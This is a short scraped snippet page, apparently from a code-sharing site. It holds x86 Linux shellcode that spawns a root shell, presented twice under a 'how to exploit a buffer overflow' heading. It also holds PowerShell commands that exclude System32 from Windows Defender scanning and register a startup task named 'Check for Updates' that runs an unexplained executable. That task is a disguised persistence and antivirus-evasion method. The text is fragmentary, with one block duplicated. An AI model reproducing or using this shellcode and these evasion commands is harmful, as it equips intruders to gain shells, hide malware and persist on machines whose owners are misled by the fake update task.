How to exploit a buffer overflow vulnerability - Practical
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
How to exploit a buffer overflow vulnerability - Practical
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
Add exclusion path
Add-MpPreference -ExclusionPath "C:\Windows\System32"Create scheduled task in powershell
#https://www.windowscentral.com/how-create-scheduled-tasks-powershell-windows-10
$action = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/k C:\Windows\System32\checkforupdates.exe"
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Check for Updates" -Description "This task checks for Windows Kernel Updates at Startup."